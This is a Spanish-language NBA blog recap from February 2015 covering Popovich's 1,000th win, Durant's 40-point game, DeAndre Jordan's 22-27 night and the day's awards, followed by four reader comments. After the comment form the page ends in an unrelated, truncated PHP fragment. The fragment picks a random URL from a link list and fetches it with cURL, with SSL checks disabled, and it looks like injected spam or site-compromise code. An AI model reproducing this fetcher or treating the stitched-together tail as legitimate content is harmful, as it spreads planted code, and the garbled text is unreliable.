La Crónica: Popovich vale por 1.000

10 de February de 2015 por MagicJohnson32

El título de esta crónica es incorrecto. Gregg Popovich no tiene precio ni tiene comparación. Pero anoche los Spurs lograron su 1.000ª victoria con él como head coach, de ahí que nos permitamos la licencia. Otro incomparable es Durant, majestuoso en el triunfo de su equipo en Denver. Se van acercando -aunque sólo ellos saben lo que les está costando- los Thunder a puestos de Playoffs. Pasaron muchas otras cosas, como una actuación descomunal de DeAndre Jordan y nuevas victorias de Warriors y Hawks.

Empezamos.

pops

San Antonio Spurs 95 – Indiana Pacers 93

19 años y 1.462 partidos más tarde de su debut como entrenador, Gregg Popovich se unió al selectísimo club de las 1.000 victorias. En una carrera labrada sobre el éxito, como prueban sus 5 anillos de campeón y el balance del 68,4% que registra hasta la fecha, el triunfo de anoche no significó (mucho) más que cualquier otro. Aunque para ello los texanos tuvieron que sudar, y mucho: perdían por 14 al final del tercer cuarto y por 9 a falta de 5 minutos para la conclusión. Los Pacers echaron por la bordan su excelente partido con un colapso general en ese tramo final: anotaron solo dos puntos en los últimos cinco minutos y vieron cómo los Spurs anotaban sus dos últimas canastas tras rebote ofensivo. Una suspensión de 5 metros de Marco Belinelli volteó el marcador cuando restaban 2 segundos y el triple final del ex Spur George Hill no entró. Tras confirmarse el hito, Popovich aseguró que la receta para lograr 1.000 victorias como entrenador es estar mucho tiempo en los banquillos y tener buenos jugadores. Claro que sí, Pops, claro que sí.

Oklahoma City Thunder 124 – Denver Nuggets 114

Otro que va alcanzando hitos es Kevin Durant. Anoche logró su 43º partido de 40 puntos o más desde que llegó a la NBA, y para ello necesitó únicamente 19 lanzamientos. La noche dulce de KD no se inició realmente hasta el tramo final del segundo cuarto, cuando los Nuggets parecían recuperarse de un mal arranque que les había situado 20 abajo (49-29). Faried y Chandler comandaron un parcial de 8-20 que ajustó el marcador pero despertó a la bestia: en los últimos 2:30 antes del descanso, Durant anotó 4 triples, cada uno más lejano y espectacular que el anterior. Ya en el tercer periodo los Nuggets volvieron a recortar diferencias y KD volvió a aparecer para poner tierra de por medio con ocho puntos consecutivos. Los locales mostraron una mejor actitud que muchas otras noches pero no pudieron más que capitular ante la exhibición del vigente MVP, quien además contó con su habitual aliado Westbrook y otro excelente partido del rookie McGary.

Resto de la jornada

Vamos con la habitual sección “¿A quiénes han ganado hoy los Warriors y los Hawks?”. Los dos líderes de la clasificación tenían compromisos sencillos, a priori, y ambos resolvieron con algún que otro problemilla de más. No tanto los Hawks, que tras caer en Memphis se recuperaron para superar a uno Wolves mucho mejores desde que han regresado los lesionados, como los Warriors, negados de cara al aro en su visita a Philadelphia pero aun así capaces de salir con una victoria que les mantiene por delante de Atlanta y que sitúa en 41-9 su mejor balance de la historia tras 50 partidos de regular season. En la zona noble del Este, los Wizards despacharon a los Magic de manera rutinaria y los Bucks tuvieron que remontar 17 puntos ante los Nets para mantener viva su racha en el Bradley Center. En Miami, los Heat superaron a los colistas Knicks con un gran Bosh y lesión de Melo, que volvió a resentirse de la rodilla y cada vez parece más cerca de despedirse de la temporada.

En el Oeste nos queda por comentar el favor que le hicieron los Jazz a Thunder y Suns al ganar a los Pelicans, que plantaron cara pese a no contar con Anthony Davis, Ryan Anderson ni Jrue Holiday, y la cómoda victoria de los Clippers en Dallas. Las lesiones de Chandler y Monta Ellis en los primeros minutos fueron demasiada losa para los de Carlisle y permitieron a los angelinos, comandados por un monstruoso DeAndre Jordan, anotarse una victoria que alivia las perspectivas ante la baja de Griffin.

PREMIOS

MVP: DeAndre Jordan se aprovechó hasta la extenuación de la ausencia de Tyson Chandler, el que tenía que haber sido su pareja de baile anoche. Acabó el choque con 22 puntos, 27 rebotes y 3 tapones. Es su segundo 20-20 del año y el primer jugador de los Clippers en conseguir más de 20 puntos y 25 rebotes desde que el equipo juega en L.A.

Rookie: Jusuf Nurkic fue el mejor novato del día con 16 puntos y 14 rebotes pero Mitch McGary confirmó su buen momento con 17 puntos y 10 rebotes.

Sorpresa: La baja de Tyson Chandler en el primer minuto de partido permitió a Charlie Villanueva disfrutar de tiempo extra de juego. El dominicano acabó siendo el mejor de los Mavs con 26 puntos. Eric Gordon anotó 31 puntos merced a su 7 de 8 en triples.

Decepción: Trey Burke desearía poder comprar todas las copias de su partido de ayer y enterrarlas en el desierto cual videojuego de ET. El base de los Jazz falló los 10 tiros que intentó y se fue para casa sin anotar en 22 minutos de juego. Otro que acabó el partido a 0 fue Deron Williams.

Esfuerzo en vano: Un mal tercer cuarto enterró las posibilidades de los Nets a pesar de los 26 puntos, 8 asistencias y 4 rebotes de Jarrett Jack.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Mo Williams a los Hornets por Gary Neal

    regalado creo :S

      Citar

  2. Jose Luis dice:
    #2

    Willams + troy daniels x Gary Neal, dinero y 2ª ronda 2019

      Citar

  3. Triceratops dice:
    #3

    Y Wade no jugará el All-Star…

    Deberían meter a Korver

      Citar

  4. txusma dice:
    #4

    Triceratops:
    Y Wade no jugará el All-Star…

    Deberían meter a Korver

    Totalmente de acuerdo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>